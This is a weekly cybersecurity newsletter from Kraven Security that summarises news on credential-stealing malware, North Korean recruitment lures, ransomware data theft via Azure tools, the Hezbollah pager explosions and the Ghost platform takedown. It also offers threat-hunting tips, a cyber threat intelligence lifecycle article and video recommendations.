Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Malware Locks Web Browser in Kiosk Mode to Steal Credentials
A new malware campaign locks users in their browser’s kiosk mode to steal Google credentials.
Top 4 takeaways:
🪲 The malware launches the browser in kiosk mode, making it full-screen and preventing navigation away from the login page. The user is then forced to enter their credentials to “unlock” the browser.
🪪 Once credentials are saved, the StealC malware steals them from the browser’s credential store.
⚡️ The technique is implemented using an AutoIt script, which identifies available browsers and launches them in kiosk mode targeting specific services like Google.
🛡️ Users should avoid entering sensitive information and use hotkey combinations or Task Manager to close the browser. If necessary, perform a hard reset and run a full antivirus scan.
North Korean Hackers Use LinkedIn and Coding Challenges to Spread Malware
North Korean threat actors are targeting cryptocurrency users on LinkedIn with malware called RustDoor.
Top 4 takeaways:
💬 The FBI issued a public service announcement warning the crypto industry about targeted attacks by North Korea using social engineering techniques.
🥸 Attackers use professional networking platforms to impersonate recruiters and deliver malware through coding challenges.
🪲 The malware is delivered through booby-trapped Visual Studio projects and includes backdoor functionalities.
🛡️ It’s crucial to train employees to be cautious about unsolicited contacts on social media and to avoid running unknown software.
Azure Storage Explorer Now Abused by Ransomware Gangs
Ransomware gangs like BianLian and Rhysida are using Microsoft’s Azure Storage Explorer and AzCopy to steal data from breached networks and store it in Azure Blob storage.
Top 4 takeaways:
🎯 Azure’s trusted status, scalability, and performance make it an attractive option for attackers to exfiltrate large volumes of data quickly and undetected.
⚙️ Azure Storage Explore is typically used for managing Azure storage, is being repurposed by threat actors for large-scale data transfers to cloud storage.
🪵 Log files created by Storage Explorer and AzCopy can help investigators determine what data was stolen and identify other potential payloads.
🛡️ Recommended defenses include monitoring for AzCopy execution, outbound traffic to Azure Blob Storage endpoints, and setting alarms for unusual file copying or access patterns.
Exploding Pagers Target Hezbollah Members
At least nine people were killed after pagers used by Hezbollah members exploded across the country. Over 2,750 people were injured, with more than 200 critically wounded.
Top 4 takeaways:
💬 Hezbollah has accused Israel of causing the explosions, suggesting the devices were intercepted and rigged with detonators.
🚑 The Lebanese Red Cross has deployed 130 ambulances and over 500 EMTs to manage the aftermath and issued an urgent call for blood donors.
📅 The incident is compared to a 1996 event where Israeli intelligence agents killed Hamas’ chief bomb maker by detonating explosives in his cellphone.
🕵️ Post-Snowden leaks have shown how easy it is for a governments to intercept technology purchases and add software or whatever else they like. But to do this on such a large scale indicates an unprecedented intelligence coup.
Europol Dismantles Encrypted Communications Platform “Ghost”
Europol and law enforcement from nine countries successfully dismantled the encrypted communications platform “Ghost,” used by organized crime for activities like drug trafficking and money laundering.
Top 3 takeaways:
🔐 Ghost offered advanced security features, including three encryption layers and a message self-destruction system, with subscriptions costing $2,350 for six months.
👻 Ghost was allegedly used for trafficking drugs, money laundering, and ordering killings.
👮 The investigation, which began in March 2022, led to the discovery of Ghost’s servers and assets, resulting in 51 arrests across multiple countries.
😬 The dismantling of Ghost and similar platforms has fragmented the encrypted communications landscape, making it more challenging for law enforcement to track criminal activities.
Top Tips of the Week
Threat Intelligence
- Conduct threat intelligence awareness sessions. Ensure that all team members understand the value and application of threat intel.
Threat Hunting
- Foster a proactive mindset in threat hunting. Be the hunter, not the hunted. Anticipate and neutralize potential threats.
- Embrace a proactive mindset in cyber threat hunting. Anticipate and neutralize potential threats before they escalate.
- Utilize threat intelligence for risk assessment in cyber threat hunting. Identify and prioritize potential risks to allocate resources effectively.
Custom Tooling
- Collaborate with threat modeling teams during custom tool development. Identify potential risks and vulnerabilities to strengthen security measures.
- Implement secure coding practices in custom tool development. Address vulnerabilities at the code level to enhance overall security.
- Regularly communicate updates about custom tools to your team. Keep stakeholders informed about enhancements and changes.
Feature Article
Analyzing cyber threat intelligence can be hard. You are often overwhelmed with data, drowned in overlapping connections, and unclear where to start or when to finish your analysis. To help guide their analysts through the maze, intelligence organizations across the globe use the intelligence lifecycle.
The intelligence lifecycle is a structured approach to collecting, analyzing, and distributing intelligence. It acts as a template that analysts can follow to produce or consume intelligence. The cyber security industry has adapted this lifecycle to suit its needs by creating the cyber threat intelligence (CTI) lifecycle.
This article is your essential guide to the CTI lifecycle. You will learn about its six stages, how this model is used in the real world, and how you can get the most out of it. Let’s jump in!
Learning Resources
Edit Your Videos Faster!
Creating content and teaching others is a great way to solidify your understanding of a topic. If you want to do this by making videos, watch this!
In this presentation, MrAlexTech, explores editing efficiently in DaVinci Resolve. It covers various tips, tricks, and workflows to speed up the editing process, making it more accessible and manageable for everyone.
Discover How to Scrape Telegram Using Python
Scripting skills are essential if you want a long and fulfilling career in cyber security.
This video (by the legendary John Hammond) demonstrates how to scrape Telegram channels and messages using Python, specifically with the Telethon library. It covers installation, setup, and basic usage, including sending messages and joining channels.
Use this video as a stepping stone to create your own web scrapers in Python!
How Do You Manage Your Time?
Time management is a skill we all must master to combat the hustle and bustle of 21st-century living. This is especially true if you are an entrepreneur, have a side hustle, or are trying to make a career change.
This video discusses managing time effectively as an entrepreneur, focusing on strategies from Dan Martell’s book “Buy Back Your Time.” These include overcoming the pain line in business growth, the buyback loop, the drip matrix, and the three trades that matter.
I highly recommend watching this and then picking up a copy of the book!
Master Active Directory Today!
To master attacking or defending large organizations, you need to know Active Directory.
This video is a beginner’s guide to Active Directory. Dale Hobbs does an excellent job covering the basics, such as objects, architecture, trusts, group policy, certificates, and more.
He also explores common issues and challenges IT teams face when setting up and using Active Directory at scale, along with best practices for keeping it secure.
Personal Notes
🤔 Back to video creation!
This week at Kraven, we have been getting back to turning our written content into videos. We have been scripting, filming, and editing new videos for our MISP series!
Video creation takes a completely different skill set than creating written content. This has made adding videos to our repertoire of free learning resources fun and challenging. It has been a steep learning curve, but we are improving our process and quality with every new video.
I look forward to sharing what we have created over the next few weeks.
